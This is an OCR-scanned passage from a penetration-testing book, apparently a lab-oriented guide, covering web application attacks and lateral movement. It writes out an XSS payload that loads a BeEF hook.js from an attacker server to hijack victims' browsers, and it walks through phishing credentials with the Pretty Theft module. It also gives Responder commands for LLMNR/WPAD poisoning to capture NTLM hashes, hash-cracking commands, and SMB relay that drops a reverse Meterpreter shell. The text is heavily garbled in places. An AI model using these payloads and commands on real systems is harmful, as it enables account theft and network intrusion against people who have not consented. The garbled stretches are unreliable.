(n||r).find(e):this.constructor(n) .find(e);if(ill])(if(nen instanceof 

x?n[0] :n, х. merge (this, x.parseHTM. (1[1] , n&&n. nodeType?n .ownerDocument| |п:а, !0) ), k. test (i[1] )&&x.is 
n)x.isFunction(this[i])?this[i] (n[1]):this.attr(i,n[il);return this)if(osa.getElementById(i[2]),o 
{if(o,id!==i[2})return r.find(e);this.lengthel, this[0]«o)return tiis eatae taa, tite M lee tere ih 
(thie rantavt-thiclnl-a thie lanath-1 thicl:v seFunetianíal?r газди Галі. ѓа calartari--t*£KE 


BeEF Client Side JavaScript 


Although this JavaScript has been well obfuscated, this 1s the payload that will control the victim user 
and will be injected into the victim browser's page. Once injected, their browser will connect back 
into your central server with the victim unaware. 


LAB - XSS on OWASPBWA 
We were able to identify an XSS via Burp or ZAP on our vulnerable Web Application VM 
(OWASPBWA). So, we can directly access the vulnerable XSS by connecting to our web service: 


ө [IP of OWASPBWA]/owaspbricks/content-2/index.php? 
user-harry3a201-script»alert(1)«962fscript^61350 


Since we have located an XSS vulnerability on a page, we can now use BeEF to help with the 


exploitation of the end user. In our initial example, 
http://[IP_of OWASPBWA |/owaspbricks/content-2/index.php?user-, the user variable takes any 
input and presents it to the end user. This proves that the end user does process the JavaScript code 
embedded from our query. 





bntent- 2/index.php?user=harry3a201<script>alert(1)<% 2fscript»6f 3 SOM aie, B 
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Bricks - XSS 


To create a successful exploit, instead of printing an alert, we are going to craft a URL that uses 
JavaScript to include the hook.js file. It will look something like: 
ө http://192.168.1.124/owaspbricks/content-2/index.php?user=harry3a20 1<script 
srce=http://192.168.1.123:3000/hook.js></script> 


I was able to append the hook.js script by using the JavaScript code: 
e <script src=[URL with hook.js]></script> 


Remember that if this is done ona public site, then the URL will need to point to a public address that 
hosts the hook.js page and listening service. 


Once you trick a victim into going to that URL using Social Engineering Tactics, they will become a 
part of your XSS zombie network. Going back to our UI panel, we should now see that a victim has 
joined our server. 


€ 127.0.0.1:3000/ui/pan: 
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@ Л 221921681123 Module Tree м 
C Offline Browsers v = 


а Browser (52) 

4 (—jHooked Domain (24) 
— Fingerprint Ajax 
Get Cookie 
c Get Form Values 
— Get Local Storage 
© Get Page HREFs 
c» Get Page HTML 
#5 Get Page and iframe H 
c Get Session Storage 
“= Get Stored Credentials 
= Overflow Cookie Jar 
— Remove stuck iframe 
— Replace HREFs 


BeEF Client Attacks 


With an account hooked, there are many different modules within BeEF to exploit the end user. As 
seen in the image above, you can try to steal stored credentials, get host IP information, scan hosts 
within their network, and much more. 


One of my favorite attacks 1s called "pretty theft" because of its simplicity. Drop down to the Social 
Engineering folder, select Pretty Theft, then configure it how you want in this case, we will use the 
Facebook example, and hit execute. Remember that the IP for the custom logo field has to be your 
BeEF IP. This will allow the victim to grab the image from your server. 


3192.168 1124 Details | Logs | Commands | Rider | XssRays | рес | Network 
Ф d 01921681123 | Module Tree Module Results History Pretty Theft 
Offine Browsers | 
| i date label Description Asks the user for their username i 
| Persistence (4) ~) 0 2015.0 command using a floating div 
Phone (16 16:1 1 
E эю) - Dialog Type Facebook Y 
| 4 —jSocial Engineering (21) назан 
© Steal Autocomplete Backing Grey a 


Fake LastPas: 
А990 Custom одо http:/0.0.0.0:3000/ullmedi 
@ Cichjacking (Generic only 


© Cippy 
Ө Fake Flash Update 
9 Fake Notification Bar (Cre 
9 Fake Notification Bar (Fire 
@ Fake Nobficabon Bar (IE) 
9 Firefox Extension (Bindst 
@ Firefox Extension (Droppe 
@ Firefox Extension (Rever: 
@ Google Phishing 
@ Lcamtuf Download 

| 9 Pretty Theft 


Pretty Theft Facebook Attack 


After the attack is submitted, a Facebook password prompt will pop up onto the victim's system. This 
is where you can get creative by using a popup in which your target users would most likely enter 
their information. If you are looking to gain Google accounts, there is also a Google Phishing module. 


The benefit of this client-side attack is that the ordinary-looking password prompt popup keeps the 
user unaware that they are part of this zombie network. 


192.168.1.124 € vc Bv 


Your session has timed out due to inactivity. 


Please re-enter your username and password to 





Pretty Theft Attack 


After the unsuspecting victim types in their password, go back to the UI to find your loot. Clicking on 
the ID “0” will show the attacker what the victim typed into that box. This should be enough to start 
gaining some access as the user, allowing you to move laterally through the environment. 


Details Logs Commands Rider XssRays рес Network 


| Module Tree Module Results History Command results 


— vu mem label 1 Fri Маг 13 2015 16:32:47 GMT- 


“WH Google Phishing data: answer=pwned:pwned 


@ Lcamtuf Download 16:31 1 
#9 Pretty Theft 
@ Replace Videos (Fake Plu 


Pretty Theft Results 


I hope I was able to demonstrate how powerful an XSS vulnerability can be. It is exponentially worse 
if the XSS finding was a stored XSS versus the reflective XSS example we just saw. If it had been a 
stored XSS, we most likely wouldn't even need to use social engineering tactics on the victim to go to 
the link; we would just need to wait until our code was executed by the victim's system. 


Cross-Site Scripting Obfuscation: 

A common problem for an attacker injection code is that the application implements some sort of 
input validation for vulnerable XSS fields. This means the XSS is still valid, but you don't have all 
the normal characters you need to successfully take advantage of this vulnerability. However, the 
great thing for a pentester is that these filters are usually improperly configured. 


Fortunately, since there are so many different types of ways to encode your XSS attacks, the filters 
from the input validation scripts usually fail. You really could write an entire book about how to craft 
different XSS attacks, but here are my quick and dirty tricks to get a working list of encoders. 


Crowd Sourcing 
One of my favorite methods to find a huge number of valid XSS vulnerabilities is to visit 


http://www.reddit.com/r/xss. People will post the different XSS findings they have come across on 
that sub-reddit. This is a great way to see what other types of XSS vulnerabilities people are finding. 
Scanners are good, however, they can never replace a human eye. A lot of the findings on this sub- 
reddit were not found by an automated process, but found manually. 


I created a quick script to grab and parse all the results from the crowd-sourced sub-reddit. To kick 
off your own scan: 

ө cd /opt/reddit_xss/ 

e python reddit_xss.py 





Reddit XSS Scrape 


Once competed, a file named output_xss.txt will be generated. As you will see in your output, people 
will obfuscate XSS attacks with “from CharCode", percent encoding, htmlentities, and other 
JavaScript commands. Now, you are armed with a good list of XSS examples (many of them still 
active) and encodings. One quick additional note is that I do not recommend you visit the vulnerable 
site with the XSS payloads, as you could be seen as attacking their website. What I wanted to do was 
show you how to generate a good list of encoding examples that might help you in your attacks. 


OWASP Cheat Sheet 
Another resource I often use is the OWASP Evasion Cheat Sheet. This is usually the first place I look 
whenever I run into an encoding problem on any of my engagements. 


The cheat sheet can be found here: 


https://www.owasp.org/index.php/XSS Filter Evasion Cheat Sheet. 


The most common XSS problems I find usually arise from length issues or the fact that the 
greater/less than symbols are not allowed. Luckily, the OWASP has many different examples to get 
around these issues. 


Cross-Site Request Forgery (CSRF) 


Cross-Site Request Forgery basically allows you to force an unwanted action onto the victim. For 
example, you send a link to someone who is currently logged into their bank account. When that 
person accesses your link, it automatically transfers money out of their account into your account. 
This happens when there is no verification process to check that the user went through the appropriate 
steps to transfer money. 


What I mean is that in order to transfer money, a user needs to login, go to their transfer payment page, 
select the recipient and then transfer the money. When these appropriate steps are taken, a CSRF 
token is generated on each and every page as you progress through the application. Additionally the 
previous token is verified before the next step can process. You can think of this as a tracking system- 
if any of those tokens are empty or wrong, the transaction does not process. 


There are many complex ways to test this, but the easiest way to manually run these tests is through 
proxying traffic. I will go through the process of making a transaction as described above and see if I 
can replay it. However, in the replay, my goal is to get the same end result without having to go 
through all of the steps, which proves that there is a CSRF vulnerability. 


Using Burp for CSRF Replay Attacks 
Let's take an example where a bank application allows transfers from one user to another. In the URL 


below, there are two parameters that are used. The first parameter is User (to whom the money will 
go). The second parameter is the dollar amount. In the case below, we successfully transferred money 
to Frank. 


What would happen if I sent this same URL to another person who was already logged into the same 
bank application? Well, if a CSRF protection were not in place, it would transfer $123.44 from the 
victim host to Frank, instantly. 


4)». (Ss. Cc | securepla.net xss_example/bank.php?User=Franké 


he ee a a | 
© Disable + $ Cookies + Zé CSS + Ш Forms = [Ый images + $ Information + @ Miscellane 





Bank Transfer Accepted For Users Frank For the Amount : $123.44 
CSRF Example 


To test if this is possible, we first capture the request via Burp. Make sure that your browser is still 
proxying to Burp and make the request with user 1. This should work just fine as you went through the 
proper channels to make the transfer. You should be able to log in, go to the transfer page, fill in the 
information, and submit. 


In the example below, we can go to Burp's Proxy Tab and the History to see our last requests. At the 


very bottom, we see the request for the bank transfer. We also see that there is a hook cookie, but 
nothing that looks like a CSRF token. 


Burp. Intruder Repeater Window Hee 


Extender 





http: / /www.securepla.net | 

http: //googleads.g.doubleclick... GET Ipagead/ads?clientsca-pub-9085173525971809&output 

http: / /clients1.google.com POST /ocsp 

http: //gtglobal-ocsp.geotrust.... POST / 

http: //securepla.net GET [xss example/example.php?alertz asdaX3 Cscript3Ealert( 
le. i 1 D 


Ip: / /www.securepla.net GET 


Host: securepla. net 

Jser-Agent: Mozilla/5.0 (Macintosh; Intel Mac 08 X 10,8; rv:24.0) Gecko/20100101 
Accept: text/html,application/xhtml-xml,application/xml;q-0.9,*/*;q-0.8 
Accept-Language: en-US,en;qe0.5 

ER айели age а, qzip, deflate 





Burp CSRF Example 


To validate this, we can actually try to repeat the request. I usually try this method because it tells me 
instantly if I can repeat requests without having to perform any additional actions. 


If you right-click anywhere in the Raw Request area, the option to "Send to Repeater" appears. 





Filter: Hiding CSS, image and general binary content 


http: / /www.securepla.net 

hitp://googleads.g.doubleclik... GET /pagead /ads?elient=ca-pub-9085 17352597 18094output=h,... 
http: / /clients1.google.com POST [жр 

hip://gtglobal-ocsp.geotrust.... POST — | 

http: / /securepla.net GET Jass. manpara prea лүн 


р: | /www.securepla.net 


Ost: gacurepla. net 

User-Agent: Mozilla/5.0 (Macintosh; Intel Мас 08 X 10.8; rq Doan active scan 
Accept: text/html, application/xhtml+xml, application/xml }д Do a passive sean 
Accept-Language: en-UB,en;qmü.5 
Accept-Encoding: grip, deflate Send lis 
Cookie: BEEPHOORSDPOtHPPah]WlOE6r208del32KBqavUBDwOus kw8 Bt MESI 
Onnection: keep-alive Send pm 


Send to Comparer 
Send to Decoder 


Sending to Burp's Repeater 





Inside the Repeater Tab, pressing the Go button will repeat the request and the following response 
will be populated. The result in our example was that the amount was transferred again without any 
verification from the user that this request was actually intended. This is great because you could send 
that same link to every user of this bank and Frank would become an instant millionaire. 





Target: http: /secureplan 
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[шк [| Paras | Headers | Hex Raw, | Headers | Hex | 


Vu ша —À 


T {төз exanple/bank.phpilsersPranksDollareli}.4¢ q ЮР ОЕ — 


Hot: шер. Date: Bat, 02 Nov 2013 11:35:11 GRT 
User-Agent: Morilla/5.0 (Macintosh, Intel Hac 08 X | Berver: Apache 

rvi24.0) Gecko/20100101 Prefox/24.0 Vary Accept-Encoding 

Меры Content-Length: ё? 

text/html appl ication xhtml éxnd , appl ication/yml: Т] Content-Type: text/html 

1. 
Aecapt-Latguage: en-US eniged.§ bank Transfer Accepted For Users Frask For the Amount т 
ccept-Encoding: gzip, deflate б mmi 

Cookie: 
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ШЛАК ат РЗА 

Connection: beepeal ive 





Executing Burp Repeater 


The application shouldn't have allowed the user to transfer money again without going through all the 
steps required to create a transfer request. Without a CSRF token, you could have an unsuspecting 
victim click on a link and have unauthorized transfers occur. If you are looking for more information 
on CSRF attacks, go to OWASPs page: 

// index.ph 





Session Tokens 


Session tokens are generally used for tracking sessions, as HTTP is a stateless protocol by default. 
What you want to look for in a session token are: (1) the fact that they cannot be guessed and, (2) that 
they properly track a user. Other things you should look for are when session tokens expire, if they are 
secure, that they validate input, and that they are properly utilized. 


In this section, we are going to specifically look at making sure session tokens are properly 
randomized and that they can't be guessed. Using Burp Suite to capture an authentication process, we 
can see in the response that there is a set-cookie value for the session tokens. This is located under 
the main Proxy tab and sub-tab History. 


СЕТ ош ] L] 20 10468 
POST. fapiirequest promo D^ Ы 200 4505 


P/1.1 200 OF 
Date; Bat, 30 Mov 2013 20:26:37 GMT 
onnection: close 
accese-control-allow-origin: 
accesa-control-allow-credentiale: true 
content-type: application/ json; charsetel/TF-8 
content-length: 182 
-frame-optiong: SAMEORIGIN 
gat. -cookie:  g85810n9237483263202013-11-3071233A26313A1712C8 2 bf 7e; Domainareddit.com; Paths’ 


['json': ['errors': [], "data": ['modhash': "ol4ahimiqf33dbé4bo4 1686acóna7255bf50be19c6c3Tac56f", 
*23148326,2013-11-30712:26:37, 8 d2bf 78 b68a5a180454906924784107a93583c3c3* ] ]] 
Burp's Raw Response 





We can right-click within the raw response section and send this request to the Sequencer feature. 





Send to Spider 
Do an active scan 
Do a passive scan 
Send to Intruder 
Send to Repeater 


Send to Sequencer 

Send to Comparer 

Send to Decoder 

Show response in browser 
Request in browser 











Sending the Raw Request to Sequencer 


Once you click Send to Sequencer, jump over to the Sequencer tab and identify which session tokens 
are important to you. Once you pick your token, you can click the Start Live Capture to start 
generating session tokens. 





Ё 














Target Proxy Spider Scanner | Intruder Repeat oder Comparer Exteni 


[ uve capture | Manual load | Analysis options 


(2) Select Live Capture Request 


Send requests here from other tools to configure a live capture. Select the request to use, configure 





Remove | | # à| Host | Request 


Clear | 


Start live capture 


(2) Token Location Within Response 
Select the location in the response where the token appears. 


© Custom location: Configure 


| 1 Live Capture Options 
Selecting the Session Token 


Once you start the capture, a new window will pop up and it will start processing/generating tokens. 
After so many tokens, it will give you summaries of entropy (randomness), character-level analysis 
(see image below), and bit-level analysis. In the image below, Burp Suite is analyzing the placement 
of each character. There are many other features within Burp's sequencer tool, so I recommend 
spending some time trying to understand how session tokens are generated. 


(0) Live capture (8693 tokens) D 











| Pause JU Copy tokens | J Auto analyze (next: 9000) Requests: 8693 
Stop Save tokens | Analyze now Errors 0 
| Summary | Character-level analysis | Bit-level analysis | Analysis Options | 
Summary " Transitions | Character set 


Character Count Analysis - Significance Levels 


100% 
10% 


1% 


0.01% 
0.001% 


<0.0001% 


Character position 
Anomalies 
278 anomalies were identified in this test: 
character 9 is too rare at position 24 (count: 1235, probability in a random sample: 0.0029%) 
character 0 is too common at position 29 (count: 624, probability in a random sample: 0.00010%) 
Character 2 is too rare at position 29 (count: 276, probability in a random sample: less than 0.000199 
Character 3 is too common at position 29 (count: 683, probability in a random sample: less than 0.00019 
character 5 is too rare at position 29 (count: 398, probability in a random sample: less than 0.000199 
character 7 is too common at position 29 (count: 730, probability in a random sample: less than 0.000199) 
character 8 is too common at position 29 (count: 640, probability in a random sample: less than 0.00019 
character 9 is too common at position 29 (count: 643, probability in a random sample: less than 0.000199 


Character Position for Cookies 


I leave a lot here to your own judgment because it takes experience to understand when session 
cookies are or aren't secure. Every major web application I have seen uses different types of 
implementations and algorithms to generate session tokens, so running something like the examples 
above or reviewing source code may be required. 


Additional Fuzzing/Input Validation 


Burp Suite is extremely extensible and has a lot of other features. One quick feature that I find 
extremely helpful during manual testing is the Intruder function. In the Intruder function, you have the 
ability to tamper with any part of the request and provide your own data. This would be very useful if 
you want to supply your own fuzzer input to test a variable. 


We are going to walk through a very high-level overview of how you could use the fuzzing feature. 
The basic idea of the following example is to access an online store and see why parameter fuzzing 
can be highly beneficial. The online store might only link to certain items from their website, but the 
content managers could have put up all of next week's sale items. They just wait for the next week and 


link the content from their main website homepage. 


I used to see a lot of these types of issues for sites that do Black Friday sales. They will have all of 
their content and prices hosted, but not linked anywhere on their page or made available to the public. 
Brute-forcing through all of the parameters will allow an attacker to know which items will go on 
sale that following week, before the public is notified. 


I created a dummy website to demonstrate this exact issue. The website: 
www.securepla.net/tehc/hack.php?id=2, 
has a GET parameter called ID. You can modify this ID field from 1 to 2 to 3 and get different results. 





(<)>) 18) is. u WWW. === net /tehc/hack. php 





Brute Forcing Parameters 


We want to brute-force through all the different parameter values to see which pages exist and which 
pages do not. Since we already have our traffic flowing through Burp, we can go to the Proxy tab and 
then to your History tab. You will see all your past requests there. Right-click on that last request and 
click “Send to Intruder”. 


http | мка ті сот СЕТ ICOM /iew/467361348/direct: “14... 

http://bid.g.doubleclick.net GET /xbbe/view?d=APEucNU24)|S8bFbq... 

http://ad.doubleclick.net GET /ad/N8166.279382.BIDMANAGER D... 
ip: //www.securepla.net GET /tehc/hack.php 


http: me — — ph?id-2 2 


Remove from scope 
Spider from here 
| Do an active scan 


Host: www. ms ш d met Do à passive scan 


J Send to Intruder 
Accept: text/html, application/xhtm Send to Repeater 
Accept-Language: en-U5,en;q=0.5 КЕ oe 
Accept-Encoding: gzip, deflate Send to Sequencer 
Referer: http://www.securepla.net/| Send to Comparer (request) 
56c1135808350178 mw UserNamesTweaki | р | перове) 
connection: keep-alive Show response in browser 


Request | in browser 























Sending Request to ШЕЕ 


Your Intruder tab at the top menu bar will light up. When you click that Intruder tab and move to the 
Positions tab, you will see a bunch of highlighted text. Since I am only testing one parameter at this 
time, I will click the "clear" button first, highlight just the "2" value (as it is the only one I want to 
fuzz), and click the "Add" button on the right side. This tells Burp to only fuzz whatever value is fed 
into the ID GET parameter and that parameter will now be yellow. 


There is another configuration selection called the Attack type. For this setting, I left it at the default 
type of Sniper. You should spend a quick second and review each of the different types of attacks on 
Burp Suite's site: 


http://portswigger.net/burp/help/intruder_positions.html. 


H Payload Positions 


Configure the positions where payloads will be inserted into the base request. The 
Attack type: | Sniper 


GET /tehc/hack.php?id-828 HTTP/1.1 

Host: www.securepla.net 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 08 X 10.8; г 
Accept: text/html, application/xhtml+xml , application/xml ; дай 
Accept-Lanquaqe: еп-08,еп;д=0. 5 

Accept-Encoding: gzip, deflate 

Referer: http://www.securepla.net/tehc/hack.php 

Cookie: ^ utmaz130486157.74136705.1385846217.1385846217.138 
secll35808350179 mw UserID=1; secll35808350179 mw UserName= 
Connection: keep-alive 





Burp Payload Positions 


Go to the Payloads tab (still within the Intruder tab) and click the "Load" button. In this example, I am 
only loading a list of numbers from 1-100. However, you can add almost any type of list, depending 
on what you are working with. For example, if I am working with a database or LDAP queries, I will 
know the parameter that needs to be manipulated and will import a list of those fuzzed parameters. It 
is really up to you to figure out which types of tests you should fuzz. From our set-up phase, you 
should have a great fuzzing list located under /opt/SecLists/ on your Kali machine. 

















(2) Payload Sets 
| 
You can define one or more payload sets. The number of payload sets depe 
ways. 
Payload set: ( 1 jv) Payload count: 150 
Payload type: | Simple list |”) Request count: 150 
(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as | 





| Add | Enter a new item 





( Add from list ... jv) 


Burp List 


Once you have your list imported, you will need to kick off the Intruder attack. At the top menu bar, 
go to Intruder and Start attack. After you start the attack, a new Intruder Attack window will pop up 
and Burp will start trying all of the parameter requests. 


Repeater Window Help 







Open saved attack 
Actively scan defined insertion points 
Send to Repeater 

Save attack config 

Load attack config 

Copy attack config 

New tab behavior 

Automatic payload positions 
Configure predefined payload lists Payload count: 150 





number of payload sets d 











Payload type: | Simple list Request count: 150 





(2) Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used 


| Paste ) 
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Starting Brute Forcing in Burp Suite 


Filter: Showing all items 











Request а | Payload Status Error Timeout | Length Comm 
о 200 CJ CJ 582 baselii 
1 1 200 С) CJ 312 
2 2 200 С) С) 582 
3 3 200 C C 299 
4 4 200 CJ CJ 325 
5 
6 6 200 C C 299 
7 7 200 C C 299 
8 8 200 CO C 299 
9 23 200 © ФО 299 
10 24 200 C CJ 299 
11 25 200 C CO 299 
12 26 200 299 
3 . 200 CJ CJ 3515 
14 28 200 Li CJ 299 
15 29 200 CQ C 299 





| Request | Response | 


Raw | Headers Hex HTML Render 


HTTP/1.1 200 OK 

Date: Wed, 15 Apr 2015 03:12:29 GMT 
Server: Apache 

Vary: Accept-Encoding 
Content-Length: 155 

Connection: close 

Content-Type: text/html 














<a href=./hack. php?id=1>Document1</a>&nbsp<a href=./hack. php?id=2>Document2<,/ 
System Password = dont hack me<p><p>Your IP was logged: 


Burp Suite Results 


As the requests start populating, how can you tell if a site has been changed based on parameter 
injection? Well, the easiest way to tell is by the length of the source code on that page, when that 
string is injected. If the source code length is different from a standard baseline, this informs us that 
there have been changes to the page. 


If we look at the sample test above, the parameter values we injected from 5 to 26, resulted in a page 
content length of 299. This source length of 299 is now our baseline for testing. When we go through 
all of the responses of all pages that are not 299 in length, we see that request 27 has a page length of 
315, which gives us the password: “dont hack me” (image above). 


You can also try manipulating other things in the original request. Try testing cookie values, 
GET/POST/HEAD parameters, user-agent strings, and other possible vulnerable fields. 


Other OWASP Top Ten Vulnerabilities 


Since OWASP is the standard in vulnerability categories, I strongly recommend that you familiarize 
yourself with the OWASP Top Ten Vulnerabilities by taking a moment to read through the Top Ten 
Cheat Sheet: 


e https://www.owasp.org/index.:php/OWASP Top Ten Cheat Sheet 


OpenDNS’ little training program provides a good training environment to test and help you 
understand these vulnerabilities. You can read more about it here: 
e https://engineering.opendns.com/2015/03/1 6/security-ninjas-an-open-source- 
application-security-training-program/ 


To set up their lab, create a Kali Linux image configured on host-only mode, as it will contain web 
vulnerabilities. 


Setting Up: 
e service apache2 start 


e git clone  https://github.com/opendns/Security Ninjas AppSec Training.git 
/opt/SNAT 

ө cd /opt/SNAT/ 

e cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini.orig 

e cp php.ini /etc/php5/apache2/ 

e mkdir /var/www/test/ 

e cp -R src/Final/* /var/www/test/ 

e chmod 777 /var/wwwi/test/*.txt 


Now, on your browser within your VM, open a browser to 127.0.0.1/test. This will walk you through 
the top ten issues, supply hints, and teach you how to exploit each of them. 
A1: Injection x \ ap 
€ > @127.0.0.1 усе | Biv ) а » | = 


B Most VisitedY Bb offensive Security N Kali Linux ‘Ñ Kali Docs ERExploit-DB % Aircrack-ng 


A1 : Injection 


Whois Lookup Service 








OWASP Top 10 


Since this is just a testing site and is vulnerable to attacks, you might want to remove it once you are 
done testing. 


When you are done: 
e rm -rf /var/www/test 
e cp /etc/php5/apache2/php.ini.orig /etc/php5/apache2/php.ini 
e service apache2 stop 


Functional/Business Logic Testing 


I want to stress one additional aspect when testing an application: This book gives a high-level 
overview into web application testing; however, functional testing is really where you make your 
money. Functional testing includes horizontal/vertical user rights testing, application flow testing, and 
ensuring things work as they should. For example, ensuring that: 

e Users aren't able to see other user's sensitive data 

e Regular users can't access administrative pages 

e Users can't change data values of other users 

e Workflows cannot be modified outside their intended flow 


One tool too to help with basic functional testing is to use Burp Proxy Pro’s Site Compare Feature. 
After spidering and brute-forcing pages with a regular user and a privileged user, we can go to 
Compare site maps. 





Burp Intruder Repeater Window Help 





Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder 


Sitemap 


Filter: Hiding not found items; hiding CSS, image and general binary content; hiding 4xx 
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> http://s.amazon-adsystem.com A Host | Met 
> http://sam.zoy.org http://thehackerplayb... GET 
> Q https://sellercentral.amazon.com http://thehackerplayb... GET 
> http://services.amazon.com http://thehackerplayb... GET 
> http://stackoverflow.com http://thehackerplayb... GET 
> http://static.amazon.com http://thehackerplayb... GET 
— http he - - http://thehackerplayb... GET 
> http://themes| http://thehackerplaybook.com/ http://thehackerplayb... GET 
> Q https://tt.a Remove from scope http://thehackerplayb... GET 
> http://twitpic. Spider this host http://thehackerplayb... GET 
> http://twitvid. | А http://thehackerplayb... GET 
> http://vimeo. Actively scan this host http://thehackerplayb... GET 
> http:/ /www.6 Passively scan this host ak 

> http://www.al] Send to SQLMapper - 

> http://www.ad Send to Laudanum Request 

> http:/ /www.af 

кнр: ан Engagement tools — 

> http H www.al Compare site maps 

> http:/ /www.al Expand branch ЕЕ PERSE 





mets thaharkarnlavhank 


Burp - Site Comparison 


This will compare the two different scans and see how responses differ based on the user account. 
Finding access as a regular user to privileged content, or identifying where responses are similar or 
different, could identify misconfigurations within the application. 
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Burp - Site Comparison Results 


If you are interested in learning more, you can visit: 
: i lication Penetration Testing. 





This is where successful testers spend a majority of their time. Anyone can run scans, but if you are 
an effective and efficient manual tester, you are leagues above the norm. 


Conclusion 

In a network penetration test, time is of the essence. You need to have a solid understanding of the 
underlying infrastructure, application, and possible vulnerabilities. This chapter has provided a high- 
level overview of vulnerabilities, how to identify them, and what type of impact they might have if 
that vulnerability is not resolved. 


Web vulnerabilities will probably be the most common vulnerability you will identify on an external 
penetration test. You should now be able to demonstrate how to take advantage of these issues 
efficiently. 


The Lateral Pass - Moving Through The Network 


At this point, you have compromised some servers and services through the SUCK network, but 
unfortunately, you only have low-privilege level accounts. A lateral pass play is used when you can’t 
seem to move forward. You might be on a network, but without privileges or account credentials, you 
would normally be stuck on a box. As a tester, you begin to distinguish yourself from the rest by your 
ability to move through the network and gain access to domain administrative accounts. However, as 
a penetration tester this shouldn’t be your only goal. It is also important to be able to identify where 
sensitive data is being stored and gain access to those environments. This might require pivoting 
through essential employees and understanding how the corporation segments their data. 


This section will focus on moving through the network and going from a limited user, all the way to 
owning the whole network. We will cover such topics as starting without credentials, proxying 
through hosts, having limited domain credentials, and then having local/domain credentials. 


On The Network Without Credentials: 


Let's say that you are on the network, but you don't have any credentials yet. Maybe you cracked their 
WPAv2 Personal Wi-Fi password or popped a box that wasn't connected to the domain. I might first 
turn on tcpdump to listen passively, identify the network, find the domain controllers, and use other 
passive types attacks. Once I feel like I have an understanding of the local network, I will start 
compromising systems using a variety of attacks specified in the next few sections. 


Responder.py 
(https://github.com/SpiderLabs/Responder) (Kali Linux) 


One tool that has helped me in gaining my first set of credentials is called responder.py. Responder is 
a tool that listens and responds to LLMNR (Link Local Multicast Name Resolution) and NBT-NS 
(NetBIOS over TCP/IP Name Service). 


Responder also actively takes advantage of the WPAD vulnerability. You can read more about this 
attack in the following Technet article: MS12-074 - Addressing a vulnerability in WPAD's PAC file 
handling (blogs.technet.com/b/srd/archive/2012/11/13/ms12-074-addressing-a-vulnerability-in- 
wpad-s-pac-file-handling.aspx). The basics are that when a browser (JE or network LAN settings) is 
set to automatically detect settings, the victim host will try to get the configuration file from the 
network. 





[Internet Options AEL — и 








*$ | X |10) Bing Pit 
General | Security | Privacy | Content Connections Programs | Advanced | | 
| 
d To set up an Internet connection, cick | Setup | ‚= — -—— 1 
Setup. 

Dial-up and Virtual Private Network settings Automatic configuraton 

Automatic configuration may override manual settings. To ensure the 

Add... use of manual settings, disable automatic configuration. 


Add VPN. М Automatcally detect settings 


- | Use automatic configuration script 


Choose Settings if you need to configure a proxy 
server for а connection. Proxy server 


Use a proxy server for your LAN (These settings wil not apply to 
dial-up or VPN connections). 


Local Area Network (LAN) settings 


LAN Settings do not apply to dial-up connections. | LANsettings | ыы Cancel 
Choose Settings above for dial-up settings. 








Automatically Detect Settings 


As the attacker, since we are on the same network as our victim, we can respond to Name 
Resolutions and inject our own PAC file to proxy all web traffic. This way we can force the user to 
authenticate against our SMB servers. You might ask, "Why is this important?" If we can get the 
victim host to authenticate against our SMB servers, we can request their NTLM challenge/response 
hashes without alerting the victim that anything is misconfigured. If the user is already authenticated to 
the domain, they will try to use those cached credentials to authenticate against our servers. 


If you want to see all of the commands for Responder, along with the documentation, visit: 
https://github.com/SpiderLabs/Responder. 


If you have followed the Setup Phase, we should already have Responder installed, so let's dive right 
in. 


In the example below, we start Responder with a few different flags. The "-i" flag is for the IP of your 
host, the "-b" flag is Off for NTLM authentication, and -r is set to Off since leaving it on could break 
things on the network: 


e python ./Responder.py -i [Attacker IP] -b Off -r Off -w On 








Re sponder.py 


Once Responder starts running, you should give it a few minutes to identify requests and send 
malicious responses. Below is this attack in progress. 


-- —- 





Responder Results 


Several things happened once Responder.py started running. First, we see that the LLMNR was 
poisoned for 192.168.0.2 and a malicious WPAD file was sent to the victim. This means that all of 
their web traffic will now use our attacker machine as a proxy. This also means that anything in clear 
text is visible to us. Secondly, we see that we are tracking the cookies for any website that the user 
visits. If they go to a site over HTTP after authentication, we can now become the victim user as we 
have all their cookies. Finally, and most importantly, we see the NTLM challenge/response hashes 
through our injected attacks. 


We do have a couple of problems with these hashes though. We can't really use these hashes right 
away in any sort of pass-the-hash type, as these are the NTLM challenge/response hashes. What we 
can do with these hashes is utilize John the Ripper or oclHashcat. 


John Example: 
$ cat hashes.txt 
cheetz:: FAKEDOMAIN:1122334455667788:4D8AABB385ADC35D8ABF778E9852BC27:010100€ 


$ john --format=netntlmv2 hashes.txt 

Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MDS5 [32/32]) 
password (cheetz) 

oclHashcat Example: 

cudaHashcat-plus64.exe -m 5600 hashes.txt password file.txt 


These two password-cracking examples are going to lead into the password-cracking section, but I 
wanted to give you a quick initial taste of how powerful Responder is. 


Sometimes it is not worth trying to crack a password. If you know the victim has a complex password 
policy or there aren't enough users online to get multiple hashes, you might want to try SMB replay 
attacks. Instead of enabling the SMB server in Responder, you can enable Metasploit's smb replay 
module (use exploit/windows/smb/smb replay) if the victim allows NTLMv1 authentication. This 
now means that any SMB requests will be forwarded to a server of your choice and their challenge 
hashes will be authenticated against that server. Let's say you are able to do this against an IT admin, 
chances are they will have escalated privileges on the servers you identified. 


If you do have to go this route, I would recommend you watch this video by Rob Fuller: 
https://www.youtube.com/watch?v=05W5tUG7z2M. Fuller talks about using ZachAttack to help 
manage all the NTLM sessions and to continually compromise the network. 


However, if the end users or servers are configured in a way that only allows NTLMv2 connections, 
these tools will fail. The only way I have been successful in SMB Replay attacks for NTLMv2 
authentication is by using the Impact framework. You can download a copy here: 


http://code.google.com/p/impacket/ 


I originally found the configuration of Impacket from: Mhttp://pen-testing.sans.org/blog/pen- 
testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python, which goes over the 
entire setup . I won't dive too much into this since you can visit the SANS site for more details to 
create a Meterpreter executable and run the python script. 


'=/Desktop/impacket-0.9.10/smbrelayx# python smbrelayx.py 


[+] Running in relay mode 
[*] setting up SMB Server 


+] Servers started, waiting f 


iy 
[*] Setting up HTTP Server 





smbrelayx.py 


Once you receive an SMB connection, it will replay that SMB against another server and 
drop/execute the reverse Meterpreter binary. We will talk later about creating reverse shells in the 
Evading AV section. 


ARP (address resolution protocol) Poisoning 


